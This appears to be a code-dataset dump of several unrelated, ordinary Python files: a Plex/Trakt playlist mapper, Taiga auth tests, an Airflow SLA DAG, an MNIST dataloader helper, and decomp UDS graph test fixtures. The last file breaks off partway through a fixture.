id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
11546186
|
from plugin.sync.core.playlist.mapper.handlers import PlexPlaylistHandler, TraktPlaylistHandler
from plex import Plex
import logging
import trakt.objects as t_objects
log = logging.getLogger(__name__)
class PlaylistMapper(object):
def __init__(self, task, p_sections_map):
self.task = task
self.p_sections_map = p_sections_map
self.plex = PlexPlaylistHandler(self.task)
self.trakt = TraktPlaylistHandler(self.task)
def expand(self, t_item):
t_type = type(t_item)
if t_type is t_objects.Show:
return self.expand_show(t_item)
if t_type is t_objects.Season:
return self.expand_season(t_item)
raise ValueError('Unknown item type: %r' % t_type)
def expand_show(self, t_show):
t_client = getattr(t_show, '_client', None)
# Retrieve plex show that matches `t_season`
p_keys = list(self.task.map.by_guid(t_show.pk))
if len(p_keys) < 1:
log.info('Unable to find show that matches guid: %r', t_show.pk)
return t_show
p_section_key, p_show_key = p_keys[0]
# Retrieve plex episodes that matches `t_show`
t_episodes = {}
for p_episode in Plex['library/metadata'].all_leaves(p_show_key):
p_season = p_episode.season
t_season = t_objects.Season(t_client, [p_season.index], t_show.index)
t_season.show = t_show
t_episode = t_objects.Episode(t_client, [(p_season.index, p_episode.index)], t_show.index)
t_episode.show = t_show
t_episode.season = t_season
if p_season.index not in t_episodes:
t_episodes[p_season.index] = {}
t_episodes[p_season.index][p_episode.index] = t_episode
# Update trakt table
self.trakt.table[t_show.pk] = t_episodes
return t_episodes
def expand_season(self, t_season):
t_client = getattr(t_season, '_client', None)
t_show = t_season.show
# Retrieve plex show that matches `t_season`
p_keys = list(self.task.map.by_guid(t_show.pk))
if len(p_keys) < 1:
log.info('Unable to find show that matches guid: %r', t_show.pk)
return t_season
p_section_key, p_show_key = p_keys[0]
# Retrieve plex season that matches `t_season`
p_seasons = dict([
(p_season.index, p_season)
for p_season in Plex['library/metadata'].children(p_show_key)
])
p_season = p_seasons.get(t_season.pk)
if p_season is None:
log.info('Unable to find season that matches pk: %r', t_season.pk)
return t_season
# Create dummy trakt episodes that matches the available plex episodes
t_episodes = {}
for p_episode in p_season.children():
t_episode = t_objects.Episode(t_client, [(p_season.index, p_episode.index)], t_season.index)
t_episode.show = t_season.show
t_episode.season = t_season
t_episodes[p_episode.index] = t_episode
# Update trakt table
self.trakt.table[t_show.pk][p_season.index] = t_episodes
return t_episodes
def get(self, key):
p_item = self.plex.get(*key) or (None, None)
t_item = self.trakt.get(*key)
if type(t_item) in [t_objects.Show, t_objects.Season]:
t_item = self.expand(t_item)
return p_item, t_item
def match(self):
t_items = []
p_items = []
# Iterate over trakt keys, sort by index
t_keys = self.trakt.keys_ordered()
t_keys_matched = []
index = 0
for t_index, key in enumerate(t_keys):
p_item, t_item = self.get(key)
for key, (p_index, p_item), t_item in self.select(key, p_item, t_item):
t_keys_matched.append(key)
t_items.append((key, index, (p_index, p_item), (t_index, t_item)))
index += 1
# Iterate over plex keys (that aren't in trakt)
p_keys = set(self.plex.items.keys()) - set(t_keys_matched)
for x, key in enumerate(p_keys):
p_item, t_item = self.get(key)
for key, (p_index, p_item), t_item in self.select(key, p_item, t_item):
t_keys_matched.append(key)
p_items.append((key, index, (p_index, p_item), (None, t_item)))
index += 1
return t_items, p_items
def select(self, base_key, p_items, t_items):
p_type = type(p_items)
t_type = type(t_items)
if p_type is not dict or t_type is not dict:
yield base_key, p_items, t_items
return
# Iterate over dictionaries
keys = set(p_items.keys()) | set(t_items.keys())
for i_key in keys:
key = base_key + (i_key,)
p_item = p_items.get(i_key, (None, None))
t_item = t_items.get(i_key)
for item in self.select(key, p_item, t_item):
yield item
|
11546193
|
import unittest
from unittest.mock import patch
import requests
import taiga.exceptions
from taiga import TaigaAPI
from .tools import MockResponse, create_mock_json
class TestAuthApp(unittest.TestCase):
@patch("taiga.client.requests")
def test_auth_success(self, requests):
requests.post.return_value = MockResponse(200, create_mock_json("tests/resources/auth_app_success.json"))
api = TaigaAPI(host="host")
api.auth_app("valid-app-id", "valid-app-secret", "valid-auth-code", "valid-state")
self.assertEqual(api.token, "<PASSWORD>")
@patch("taiga.client.requests")
def test_auth_not_success(self, requests):
requests.post.return_value = MockResponse(401, "Not allowed")
api = TaigaAPI(host="host")
self.assertRaises(
taiga.exceptions.TaigaRestException,
api.auth_app,
"valid-app-id",
"valid-app-secret",
"valid-auth-code",
"valid-state",
)
@patch("taiga.client.requests.post")
def test_auth_connection_error(self, requests_post):
requests_post.side_effect = requests.RequestException()
api = TaigaAPI(host="host")
self.assertRaises(
taiga.exceptions.TaigaRestException,
api.auth_app,
"valid-app-id",
"valid-app-pass",
"valid-auth-code",
"valid-state",
)
|
11546200
|
import time
from datetime import timedelta
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.utils.dates import timezone
def _sleep():
time.sleep(3)
default_args = {
'owner': 'dataength',
'start_date': timezone.datetime(2021, 3, 1),
'email': ['<EMAIL>'],
'sla': timedelta(seconds=10),
}
with DAG('test_sla',
default_args=default_args,
description='A simple pipeline to S3 hook',
schedule_interval='*/5 * * * *',
catchup=False) as dag:
first_check = PythonOperator(
task_id='first_check',
python_callable=_sleep,
sla=timedelta(seconds=2),
)
second_check = PythonOperator(
task_id='second_check',
python_callable=_sleep,
)
first_check >> second_check
|
11546229
|
import torch
from torch.utils.data import sampler
from torchvision import datasets
from torch.utils.data import DataLoader
from torch.utils.data import SubsetRandomSampler
from torchvision import transforms
def get_dataloaders_mnist(batch_size, num_workers=0,
validation_fraction=None,
train_transforms=None,
test_transforms=None):
if train_transforms is None:
train_transforms = transforms.ToTensor()
if test_transforms is None:
test_transforms = transforms.ToTensor()
train_dataset = datasets.MNIST(root='data',
train=True,
transform=train_transforms,
download=True)
valid_dataset = datasets.MNIST(root='data',
train=True,
transform=test_transforms)
test_dataset = datasets.MNIST(root='data',
train=False,
transform=test_transforms)
if validation_fraction is not None:
num = int(validation_fraction * 60000)
train_indices = torch.arange(0, 60000 - num)
valid_indices = torch.arange(60000 - num, 60000)
train_sampler = SubsetRandomSampler(train_indices)
valid_sampler = SubsetRandomSampler(valid_indices)
valid_loader = DataLoader(dataset=valid_dataset,
batch_size=batch_size,
num_workers=num_workers,
sampler=valid_sampler)
train_loader = DataLoader(dataset=train_dataset,
batch_size=batch_size,
num_workers=num_workers,
drop_last=True,
sampler=train_sampler)
else:
train_loader = DataLoader(dataset=train_dataset,
batch_size=batch_size,
num_workers=num_workers,
drop_last=True,
shuffle=True)
test_loader = DataLoader(dataset=test_dataset,
batch_size=batch_size,
num_workers=num_workers,
shuffle=False)
if validation_fraction is None:
return train_loader, test_loader
else:
return train_loader, valid_loader, test_loader
|
11546275
|
import os
import pytest
from predpatt import PredPatt, PredPattOpts, load_conllu
from decomp.syntax.dependency import DependencyGraphBuilder
from decomp.semantics.predpatt import PredPattGraphBuilder
from decomp.semantics.uds import UDSSentenceGraph
@pytest.fixture
def graph_sentence():
return 'The police commander of Ninevah Province announced that bombings had declined 80 percent in Mosul , whereas there had been a big jump in the number of kidnappings .'
@pytest.fixture
def normalized_sentence_graph(rawtree,
listtree,
normalized_sentence_annotations):
node_ann, edge_ann = normalized_sentence_annotations
ud = DependencyGraphBuilder.from_conll(listtree, 'tree1')
pp = PredPatt(next(load_conllu(rawtree))[1],
opts=PredPattOpts(resolve_relcl=True,
borrow_arg_for_relcl=True,
resolve_conj=False,
cut=True))
pp_graph = PredPattGraphBuilder.from_predpatt(pp, ud, 'tree1')
graph = UDSSentenceGraph(pp_graph, 'tree1')
graph.add_annotation(*node_ann['tree1'])
graph.add_annotation(*edge_ann['tree1'])
return graph
@pytest.fixture
def raw_sentence_graph(rawtree,
listtree,
raw_sentence_annotations):
node_ann, edge_ann = raw_sentence_annotations
ud = DependencyGraphBuilder.from_conll(listtree, 'tree1')
pp = PredPatt(next(load_conllu(rawtree))[1],
opts=PredPattOpts(resolve_relcl=True,
borrow_arg_for_relcl=True,
resolve_conj=False,
cut=True))
pp_graph = PredPattGraphBuilder.from_predpatt(pp, ud, 'tree1')
graph = UDSSentenceGraph(pp_graph, 'tree1')
graph.add_annotation(*node_ann['tree1'])
graph.add_annotation(*edge_ann['tree1'])
return graph
@pytest.fixture
def rawtree(test_data_dir):
fpath = os.path.join(test_data_dir, 'rawtree.conllu')
with open(fpath) as f:
return f.read()
@pytest.fixture
def listtree(rawtree):
return [l.split() for l in rawtree.split('\n')]
@pytest.fixture
def graph_syntax_nodes():
return {'tree1-syntax-1': {'Definite': 'Def',
'PronType': 'Art',
'domain': 'syntax',
'form': 'The',
'lemma': 'the',
'position': 1,
'type': 'token',
'upos': 'DET',
'xpos': 'DT'},
'tree1-syntax-10': {'Mood': 'Ind',
'Tense': 'Past',
'VerbForm': 'Fin',
'domain': 'syntax',
'form': 'had',
'lemma': 'have',
'position': 10,
'type': 'token',
'upos': 'AUX',
'xpos': 'VBD'},
'tree1-syntax-11': {'Tense': 'Past',
'VerbForm': 'Part',
'domain': 'syntax',
'form': 'declined',
'lemma': 'decline',
'position': 11,
'type': 'token',
'upos': 'VERB',
'xpos': 'VBN'},
'tree1-syntax-12': {'NumType': 'Card',
'domain': 'syntax',
'form': '80',
'lemma': '80',
'position': 12,
'type': 'token',
'upos': 'NUM',
'xpos': 'CD'},
'tree1-syntax-13': {'Number': 'Sing',
'domain': 'syntax',
'form': 'percent',
'lemma': 'percent',
'position': 13,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NN'},
'tree1-syntax-14': {'domain': 'syntax',
'form': 'in',
'lemma': 'in',
'position': 14,
'type': 'token',
'upos': 'ADP',
'xpos': 'IN'},
'tree1-syntax-15': {'Number': 'Sing',
'domain': 'syntax',
'form': 'Mosul',
'lemma': 'Mosul',
'position': 15,
'type': 'token',
'upos': 'PROPN',
'xpos': 'NNP'},
'tree1-syntax-16': {'domain': 'syntax',
'form': ',',
'lemma': ',',
'position': 16,
'type': 'token',
'upos': 'PUNCT',
'xpos': ','},
'tree1-syntax-17': {'domain': 'syntax',
'form': 'whereas',
'lemma': 'whereas',
'position': 17,
'type': 'token',
'upos': 'SCONJ',
'xpos': 'IN'},
'tree1-syntax-18': {'domain': 'syntax',
'form': 'there',
'lemma': 'there',
'position': 18,
'type': 'token',
'upos': 'PRON',
'xpos': 'EX'},
'tree1-syntax-19': {'Mood': 'Ind',
'Tense': 'Past',
'VerbForm': 'Fin',
'domain': 'syntax',
'form': 'had',
'lemma': 'have',
'position': 19,
'type': 'token',
'upos': 'AUX',
'xpos': 'VBD'},
'tree1-syntax-2': {'Number': 'Sing',
'domain': 'syntax',
'form': 'police',
'lemma': 'police',
'position': 2,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NN'},
'tree1-syntax-20': {'Tense': 'Past',
'VerbForm': 'Part',
'domain': 'syntax',
'form': 'been',
'lemma': 'be',
'position': 20,
'type': 'token',
'upos': 'VERB',
'xpos': 'VBN'},
'tree1-syntax-21': {'Definite': 'Ind',
'PronType': 'Art',
'domain': 'syntax',
'form': 'a',
'lemma': 'a',
'position': 21,
'type': 'token',
'upos': 'DET',
'xpos': 'DT'},
'tree1-syntax-22': {'Degree': 'Pos',
'domain': 'syntax',
'form': 'big',
'lemma': 'big',
'position': 22,
'type': 'token',
'upos': 'ADJ',
'xpos': 'JJ'},
'tree1-syntax-23': {'Number': 'Sing',
'domain': 'syntax',
'form': 'jump',
'lemma': 'jump',
'position': 23,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NN'},
'tree1-syntax-24': {'domain': 'syntax',
'form': 'in',
'lemma': 'in',
'position': 24,
'type': 'token',
'upos': 'ADP',
'xpos': 'IN'},
'tree1-syntax-25': {'Definite': 'Def',
'PronType': 'Art',
'domain': 'syntax',
'form': 'the',
'lemma': 'the',
'position': 25,
'type': 'token',
'upos': 'DET',
'xpos': 'DT'},
'tree1-syntax-26': {'Number': 'Sing',
'domain': 'syntax',
'form': 'number',
'lemma': 'number',
'position': 26,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NN'},
'tree1-syntax-27': {'domain': 'syntax',
'form': 'of',
'lemma': 'of',
'position': 27,
'type': 'token',
'upos': 'ADP',
'xpos': 'IN'},
'tree1-syntax-28': {'Number': 'Plur',
'domain': 'syntax',
'form': 'kidnappings',
'lemma': 'kidnapping',
'position': 28,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NNS'},
'tree1-syntax-29': {'domain': 'syntax',
'form': '.',
'lemma': '.',
'position': 29,
'type': 'token',
'upos': 'PUNCT',
'xpos': '.'},
'tree1-syntax-3': {'Number': 'Sing',
'domain': 'syntax',
'form': 'commander',
'lemma': 'commander',
'position': 3,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NN'},
'tree1-syntax-4': {'domain': 'syntax',
'form': 'of',
'lemma': 'of',
'position': 4,
'type': 'token',
'upos': 'ADP',
'xpos': 'IN'},
'tree1-syntax-5': {'Number': 'Sing',
'domain': 'syntax',
'form': 'Ninevah',
'lemma': 'Ninevah',
'position': 5,
'type': 'token',
'upos': 'PROPN',
'xpos': 'NNP'},
'tree1-syntax-6': {'Number': 'Sing',
'domain': 'syntax',
'form': 'Province',
'lemma': 'Province',
'position': 6,
'type': 'token',
'upos': 'PROPN',
'xpos': 'NNP'},
'tree1-syntax-7': {'Mood': 'Ind',
'Tense': 'Past',
'VerbForm': 'Fin',
'domain': 'syntax',
'form': 'announced',
'lemma': 'announce',
'position': 7,
'type': 'token',
'upos': 'VERB',
'xpos': 'VBD'},
'tree1-syntax-8': {'domain': 'syntax',
'form': 'that',
'lemma': 'that',
'position': 8,
'type': 'token',
'upos': 'SCONJ',
'xpos': 'IN'},
'tree1-syntax-9': {'Number': 'Plur',
'domain': 'syntax',
'form': 'bombings',
'lemma': 'bombing',
'position': 9,
'type': 'token',
'upos': 'NOUN',
'xpos': 'NNS'}}
@pytest.fixture
def graph_normalized_semantics_nodes():
return {'tree1-semantics-arg-0': {'domain': 'semantics',
'frompredpatt': False,
'type': 'argument'},
'tree1-semantics-arg-11': {'domain': 'semantics',
'frompredpatt': True,
'type': 'argument'},
'tree1-semantics-arg-13': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': 1.0,
'value': -1.147},
'arg-kind': {'confidence': 1.0,
'value': -1.147},
'arg-particular': {'confidence': 1.0,
'value': 1.1619}},
'type': 'argument'},
'tree1-semantics-arg-15': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': 1.0,
'value': -1.147},
'arg-kind': {'confidence': 1.0,
'value': 1.1619},
'arg-particular': {'confidence': 1.0,
'value': 1.1619}},
'type': 'argument'},
'tree1-semantics-arg-23': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': 1.0,
'value': -1.147},
'arg-kind': {'confidence': 1.0,
'value': -1.147},
'arg-particular': {'confidence': 1.0,
'value': 1.1619}},
'type': 'argument'},
'tree1-semantics-arg-3': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': 1.0,
'value': -1.147},
'arg-kind': {'confidence': 1.0,
'value': -1.147},
'arg-particular': {'confidence': 1.0,
'value': 1.1619}},
'type': 'argument'},
'tree1-semantics-arg-9': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': 1.0,
'value': -1.147},
'arg-kind': {'confidence': 1.0,
'value': -1.147},
'arg-particular': {'confidence': 1.0,
'value': 1.1619}},
'type': 'argument'},
'tree1-semantics-arg-author': {'domain': 'semantics', 'frompredpatt': False, 'type': 'argument'},
'tree1-semantics-arg-addressee': {'domain': 'semantics',
'frompredpatt': False,
'type': 'argument'},
'tree1-semantics-pred-11': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'pred-dynamic': {'confidence': 1.0,
'value': 0.7748},
'pred-hypothetical': {'confidence': 1.0,
'value': -1.5399},
'pred-particular': {'confidence': 1.0,
'value': 0.7748}},
'type': 'predicate'},
'tree1-semantics-pred-20': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'pred-dynamic': {'confidence': 1.0,
'value': -1.5399},
'pred-hypothetical': {'confidence': 1.0,
'value': 0.7748},
'pred-particular': {'confidence': 1.0,
'value': -1.54}},
'type': 'predicate'},
'tree1-semantics-pred-7': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'pred-dynamic': {'confidence': 1.0,
'value': 0.7748},
'pred-hypothetical': {'confidence': 1.0,
'value': -1.54},
'pred-particular': {'confidence': 1.0,
'value': 0.7748}},
'type': 'predicate'},
'tree1-semantics-pred-root': {'domain': 'semantics',
'frompredpatt': False,
'type': 'predicate'}}
@pytest.fixture
def graph_raw_semantics_nodes():
return {'tree1-semantics-arg-0': {'domain': 'semantics',
'frompredpatt': False,
'type': 'argument'},
'tree1-semantics-arg-11': {'domain': 'semantics',
'frompredpatt': True,
'type': 'argument'},
'tree1-semantics-arg-13': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-kind': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-particular': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}}},
'type': 'argument'},
'tree1-semantics-arg-15': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-kind': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-particular': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}}},
'type': 'argument'},
'tree1-semantics-arg-23': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-kind': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-particular': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}}},
'type': 'argument'},
'tree1-semantics-arg-3': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-kind': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-particular': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}}},
'type': 'argument'},
'tree1-semantics-arg-9': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'arg-abstract': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-kind': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}},
'arg-particular': {'confidence': {'genericity-arg-annotator-103': 4},
'value': {'genericity-arg-annotator-103': 0}}},
'type': 'argument'},
'tree1-semantics-arg-addressee': {'domain': 'semantics',
'frompredpatt': False,
'type': 'argument'},
'tree1-semantics-arg-author': {'domain': 'semantics',
'frompredpatt': False,
'type': 'argument'},
'tree1-semantics-pred-11': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'pred-dynamic': {'confidence': {'genericity-pred-annotator-88': 4},
'value': {'genericity-pred-annotator-88': 0}},
'pred-hypothetical': {'confidence': {'genericity-pred-annotator-88': 4},
'value': {'genericity-pred-annotator-88': 0}},
'pred-particular': {'confidence': {'genericity-pred-annotator-88': 4},
'value': {'genericity-pred-annotator-88': 0}}},
'type': 'predicate'},
'tree1-semantics-pred-20': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'pred-dynamic': {'confidence': {'genericity-pred-annotator-88': 0},
'value': {'genericity-pred-annotator-88': 1}},
'pred-hypothetical': {'confidence': {'genericity-pred-annotator-88': 0},
'value': {'genericity-pred-annotator-88': 1}},
'pred-particular': {'confidence': {'genericity-pred-annotator-88': 0},
'value': {'genericity-pred-annotator-88': 1}}},
'type': 'predicate'},
'tree1-semantics-pred-7': {'domain': 'semantics',
'frompredpatt': True,
'genericity': {'pred-dynamic': {'confidence': {'genericity-pred-annotator-88': 4},
'value': {'genericity-pred-annotator-88': 0}},
'pred-hypothetical': {'confidence': {'genericity-pred-annotator-88': 4},
'value': {'genericity-pred-annotator-88': 0}},
'pred-particular': {'confidence': {'genericity-pred-annotator-88': 4},
'value': {'genericity-pred-annotator-88': 0}}},
'type': 'predicate'},
'tree1-semantics-pred-root': {'domain': 'semantics',
'frompredpatt': False,
'type': 'predicate'}}
@pytest.fixture
def graph_normalized_semantics_edges():
return {('tree1-semantics-arg-0', 'tree1-semantics-pred-20'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'head'},
('tree1-semantics-arg-0', 'tree1-semantics-pred-7'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'head'},
('tree1-semantics-arg-11', 'tree1-semantics-pred-11'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'head'},
('tree1-semantics-pred-11', 'tree1-semantics-arg-13'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': 1.0,
'value': -0.0},
'change_of_location': {'confidence': 1.0,
'value': -0.0},
'change_of_possession': {'confidence': 1.0,
'value': -0.0},
'change_of_state': {'confidence': 0.1675,
'value': 0.0032},
'change_of_state_continuous': {'confidence': 0.1675,
'value': 0.0032},
'existed_after': {'confidence': 0.6796,
'value': 0.0111},
'existed_before': {'confidence': 0.6796,
'value': 0.0111},
'existed_during': {'confidence': 1.0,
'value': 1.3421},
'instigation': {'confidence': 1.0,
'value': -0.0},
'partitive': {'confidence': 0.564,
'value': -0.0941},
'sentient': {'confidence': 1.0,
'value': -0.9348},
'volition': {'confidence': 1.0,
'value': -0.0},
'was_for_benefit': {'confidence': 1.0,
'value': -0.0},
'was_used': {'confidence': 0.564,
'value': -0.0}},
'type': 'dependency'},
('tree1-semantics-pred-11', 'tree1-semantics-arg-15'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'dependency'},
('tree1-semantics-pred-11', 'tree1-semantics-arg-9'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': 0.1395,
'value': -0.0549},
'change_of_location': {'confidence': 0.1395,
'value': -0.0549},
'change_of_possession': {'confidence': 1.0,
'value': -0.3909},
'change_of_state': {'confidence': 0.3333,
'value': -0.0085},
'change_of_state_continuous': {'confidence': 0.0791,
'value': -0.0351},
'existed_after': {'confidence': 0.6567,
'value': 0.124},
'existed_before': {'confidence': 1.0,
'value': 1.3954},
'existed_during': {'confidence': 1.0,
'value': 1.3959},
'instigation': {'confidence': 1.0,
'value': -1.5074},
'partitive': {'confidence': 0.0791,
'value': -0.1354},
'sentient': {'confidence': 1.0,
'value': -1.508},
'volition': {'confidence': 1.0,
'value': -0.3909},
'was_for_benefit': {'confidence': 0.3418,
'value': 0.0008},
'was_used': {'confidence': 0.3333,
'value': -0.0085}},
'type': 'dependency'},
('tree1-semantics-pred-20', 'tree1-semantics-arg-23'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'dependency'},
('tree1-semantics-pred-7', 'tree1-semantics-arg-11'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'dependency'},
('tree1-semantics-pred-7', 'tree1-semantics-arg-3'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': 1.0,
'value': 1.3526},
'change_of_location': {'confidence': 0.272,
'value': -0.0922},
'change_of_possession': {'confidence': 0.7724,
'value': -0.0},
'change_of_state': {'confidence': 0.2067,
'value': -0.0548},
'change_of_state_continuous': {'confidence': 1.0,
'value': -0.0},
'existed_after': {'confidence': 1.0,
'value': 1.3527},
'existed_before': {'confidence': 1.0,
'value': 1.3527},
'existed_during': {'confidence': 1.0,
'value': 1.3557},
'instigation': {'confidence': 1.0,
'value': 1.3557},
'partitive': {'confidence': 0.1148,
'value': -0.0018},
'sentient': {'confidence': 1.0,
'value': 1.354},
'volition': {'confidence': 1.0,
'value': 1.3545},
'was_for_benefit': {'confidence': 0.1976,
'value': -0.0504},
'was_used': {'confidence': 0.4373,
'value': -0.0207}},
'type': 'dependency'},
('tree1-semantics-pred-root', 'tree1-semantics-arg-0'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'dependency'},
('tree1-semantics-pred-root', 'tree1-semantics-arg-addressee'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'dependency'},
('tree1-semantics-pred-root', 'tree1-semantics-arg-author'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'dependency'}}
@pytest.fixture
def graph_raw_semantics_edges():
return {('tree1-semantics-arg-0', 'tree1-semantics-pred-20'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'head'},
('tree1-semantics-arg-0', 'tree1-semantics-pred-7'): {'domain': 'semantics',
'frompredpatt': False,
'type': 'head'},
('tree1-semantics-arg-11', 'tree1-semantics-pred-11'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'head'},
('tree1-semantics-pred-11', 'tree1-semantics-arg-13'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'change_of_location': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'change_of_possession': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'change_of_state': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'change_of_state_continuous': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'existed_after': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'existed_before': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'existed_during': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'instigation': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'partitive': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'sentient': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'volition': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'was_for_benefit': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}},
'was_used': {'confidence': {'protoroles-annotator-13': 0,
'protoroles-annotator-20': 0},
'value': {'protoroles-annotator-13': 2,
'protoroles-annotator-20': 0}}},
'type': 'dependency'},
('tree1-semantics-pred-11', 'tree1-semantics-arg-15'): {'domain': 'semantics',
'frompredpatt': True,
'type': 'dependency'},
('tree1-semantics-pred-11', 'tree1-semantics-arg-9'): {'domain': 'semantics',
'frompredpatt': True,
'protoroles': {'awareness': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'change_of_location': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'change_of_possession': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'change_of_state': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'change_of_state_continuous': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'existed_after': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'existed_before': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'existed_during': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'instigation': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'partitive': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'sentient': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'volition': {'confidence': {'protoroles-annotator-14': 1,
'protoroles-annotator-16': 1},
'value': {'protoroles-annotator-14': 4,
'protoroles-annotator-16': 1}},
'was_for_benefit': {'confidence': {'protoroles-annotator-14': 1,
